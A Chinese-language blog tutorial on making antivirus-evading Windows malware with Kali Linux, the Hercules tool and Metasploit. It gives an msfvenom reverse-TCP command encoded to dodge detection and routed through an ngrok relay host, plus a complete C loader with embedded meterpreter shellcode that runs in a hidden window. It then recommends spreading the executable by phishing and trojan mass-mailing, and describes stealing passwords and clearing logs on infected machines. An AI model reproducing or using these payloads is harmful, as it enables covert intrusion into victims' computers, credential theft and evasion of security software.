網絡安全 - Kali Linux反向端口鏈接&免殺

本篇文章適用學習,維護網絡安全,作合法公民linux

介紹:以前使用 小七免殺工具包 來做免殺(有空我就上傳到網盤),免殺就是對PE(.bat、.exe等)文件中出現的特徵碼進行替換修改,方法有等價替換指令,字符串修改大小寫、互補等。git

現在開源的東西比起手工來作,不只免殺率高,速度快,功能多,並且會長期維護。下面我就介紹下 Hercules 工具:github

1、安裝 Kali Linux

須要安裝虛擬機,運行下載的.iso(若是不用Kali,BT5也能夠,Kali是BT系列的升級版)。sql

2、搭建GO語言環境

一、安裝GO

圖片描述

解壓到 /usr/local 目錄下:shell

圖片描述

二、配置環境

讓GO命令有效:windows

圖片描述

文件後追加 export PATH=$PATH:/usr/local/go/bin安全

圖片描述

再按 Esc ,保存退出。查看是否正確配置:服務器

圖片描述

3、安裝Hercules

一、安裝升級

圖片描述

圖片描述

升級軟件包:網絡

圖片描述

二、運行並生成免殺載荷

圖片描述

圖片描述

選擇(1),輸入ip、端口號(用於反彈回連),以後依次輸入y及要生成的文件名,很簡單就不截圖了。框架

圖片描述

文件生成後,在 在線查毒網站 檢測下,顯示不少殺毒軟件都檢測不到。

4、內網穿透

一、登陸官網並添加隧道

Kali Linux 上訪問 ngrok網站(使用花生殼作內網穿透也能夠),註冊登錄,而後點擊隧道管理進入:

圖片描述

圖片描述

點擊確認添加,這樣隧道就建立完成:

圖片描述

二、運行客戶端

進入Kali,下載運行 ngrok客戶端 地址:https://www.ngrok.cc/#down-cl...,下載linux的版本

圖片描述

成功運行ngrok客戶端後,內網穿透就弄好了,外網地址就是下圖中的 server.nogrok.cc: 註冊隧道的端口號

圖片描述

5、反向端口鏈接

使用MetaSpolit Framework簡稱Msf框架。

一、生成payload

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’    lhost=server.ngrok.cc lport=00000 -f c

-p 指定payload,–e 編碼器,-i 編碼次數(次數越多免殺概率越高),-b 去除壞字符,lhost 服務器(ngrok默認爲server.ngrok.cc) lport 隧道的端口,-f 生成指定格式(py、exe等,建議生成c)

若是-f指定的是c,則將輸出的buf[]複製出來:

圖片描述

二、VC6.0編譯shellcode

這個就不貼圖了,直接貼代碼了

#include <stdio.h>
#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"") // 運行時不顯示窗口

unsigned char buf[] = 
"\xbb\xa1\x7d\x04\x59\xda\xca\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"
"\x9e\x31\x5d\x14\x03\x5d\x14\x83\xed\xfc\x43\x88\xba\x1e\xde"
"\x61\xa6\x7a\x33\x5c\x5c\x5f\x47\x07\xae\x56\x16\x2f\x53\xa8"
"\x5c\x61\x24\x38\x5f\xf1\xd5\xd8\xed\x77\x1f\xc2\xb5\x4f\x0b"
"\x05\xb8\x9c\x44\xf1\x31\x77\xdc\x47\x2f\xaf\xa7\xf5\x50\xa9"
"\xa3\x45\xb7\x52\x62\x52\x8e\xb9\x03\x5e\xcd\x1f\xb8\xec\xa8"
"\x64\x3e\x96\x16\x0d\x3e\x5d\x30\x53\xa7\xcf\xf0\xd0\xaa\x32"
"\xe5\x6b\x12\x74\x50\xcb\xdd\x12\x89\xde\x29\x03\xca\xcb\xb8"
"\x2c\xd8\xdf\x42\xf8\xa2\x42\xdd\xdc\x31\xe8\x15\xe9\x40\x87"
"\x3c\x4b\xf7\x79\x30\x7b\x33\xee\xcc\x46\xa6\x17\x39\x57\xec"
"\xf0\xcc\x6d\xe3\x17\xf5\xe8\x5c\xc4\xd4\xbb\x26\x8c\xc0\x0e"
"\xe3\xab\xc6\xad\x84\x0d\x25\x9c\x37\x30\xd0\x3c\x81\x9e\x29"
"\x8b\xb5\xec\xd2\xbf\x01\xf0\xc6\x0d\xde\xa8\x9b\xe5\x72\x88"
"\x00\x21\xd8\xac\x78\xb4\xe7\x70\x05\xda\xe3\xa9\xaf\xcf\x2c"
"\x04\x6a\xe7\x0d\x2c\xc3\xce\x3a\x48\x0f\x94\xac\xb9\xb8\xcb"
"\xa6\xdf\xed\xf8\x1d\x75\x4e\x16\x78\xb6\xe8\x0c\x07\x48\x84"
"\xce\x79\xd4\xa0\x68\x8f\xc5\xd4\xde\x31\x13\x27\x4e\xa7\xaf"
"\x51\x54\x8a\x12\x1a\xb7\x8a\x97\x60\x10\x48\x01\x6c\x39\x46"
"\x40\x07\x8d\xe1\x19\xf4\x65\x25\x87\xd5\x27\x8b\x11\x7f\xcb"
"\xd2\x30\x0f\x91\x2f\x30\x55\x1d\x7d\xef\xb0\x03\x98\x59\x0e"
"\x29\xc5\xbd\x6c\x8b\xe1\x84\x8f\xee\xc9\x22\xe9\x62\xf1\x06"
"\x19\xf1\xbe\xa5\x8c\x88\xed\xc2\x71\x70\x01\x59\x4c\x15\x5a"
"\xe4\xe8\x75\x3c\xdc\x96\xd5\x41\x70\xe3\x60\x7d\x45\x29\x56"
"\xd2\xf4\x73\xb5\x06\xc7\xba\x53\x22\xdd\xbd\x5d\x89\x91\xe6"
"\x72\xfc\x75\x37\xbc\xed\xbb\x16\x05\x01\x56\x3a\x32\x72\x69"
"\x93\xec\xa4\x7b\x33\xff\xd7\x92\x7d\x1c\xef\xd7\x75\x7d\x45"
"\x5f\x67\x47\x2b\x90\x9b\x6e\x82\xb4\x17\xcd\x3b\x45\x8b\x4d"
"\x45\x50\x71\xeb\xb9\x49\x42\x64\xd7\x0c\x67\x61\xee\x21\x6e"
"\x78\x7e\x32\x26\xe7\x65\x10\x9d\x69\x46\x21\x2f\x97\x3c\x3d"
"\xbe\xd7\x06\x2f\x5b\x81\xae\xe9\x22\x6d\xdc\x6d\x2f\x64\xfb"
"\xc1\xe1\xae\xf6\xc6\x0a\x73\x52\x10\x7c\xb0\x3f\xf2\x60\x69"
"\xaf\x05\x6a\xa6\x2a\x53\xec\xb8\x73\xdd\xd3\x2c\x82\xab\x64"
"\x97\xf3\xdb\xe8\x2f\x22\x50\xde\xf4\x2e\x97\x8a\x79\xf4\xdc"
"\x92\x37\x45\x23\x86\x63\x42\x5e\x98\xc2\x49\xc3\x1d\x34\x1d"
"\xac\x24\x76\xef\xd7\x69\x8d\xd2\x2c\x40\x1c\xa2\x36\x29\x6c"
"\xa5\x25\x01\xd7\xbd\x7c\x15\x54\x07\xaa\x2c\x5a\xeb\x53\x6d"
"\x3b\x3a\x45\x50\x6d\x4f\x96\xb3\xf9\xdb\x96\x29\x0d\x6a\xa9"
"\x58\x9f\xf0\x14\xc3\x79\x0c\x99\x3c\x58\xc0\x61\xb6\xca\x5d"
"\x61\x9f\xf9\x65\x99\xb4\x91\xac\x5d\x7c\xf5\x9c\x99\xe5\x60"
"\x99\xc9\x8d\xcb\xe7\xd4\xc3\x5c\xd6\x39\xd4\xe0\x71\x73\xa2"
"\x24\xdd\x3c\xb4\x82\xda\x2c\xaf\xa5\x1e\x48\xa7\xf5\x89\x4d"
"\xb6\x10\x74\xe5\x06\xf2\x5b\xfa\x3c\x58\x84\xc6\x68\x16\x8b"
"\x26\x7a\x2f\x2a\x0c\x40\xf8\x61\x8b\x49\x14\x27\xf7\xe5\x4f"
"\x9a\xe3\x47\xb7\x1a\x13\xe9\x16\x06\x84\xab\x70";

main() {
    ((void(*)(void))&buf)();
}

編譯.cpp,生成.exe。

圖片描述

接下來咱們還要配置Msf反向端口監聽。

三、Msf配置監聽

Msf前先運行psql(新版Msf加入了psql的支持):

圖片描述

配置Msf利用:

圖片描述

這時咱們就大功告成了,只需等待客戶端運行咱們的.exe(釣魚掛馬羣發等方式散播)

四、測試

運行.exe,Msf顯示已經回連,以後的操做就跟windows同樣了,讀取對方密碼、目錄、清log等等。。。

圖片描述

圖片描述

通過運行,360、騰訊殺毒軟件沒有檢測出來問題。。。

相關文章
相關標籤/搜索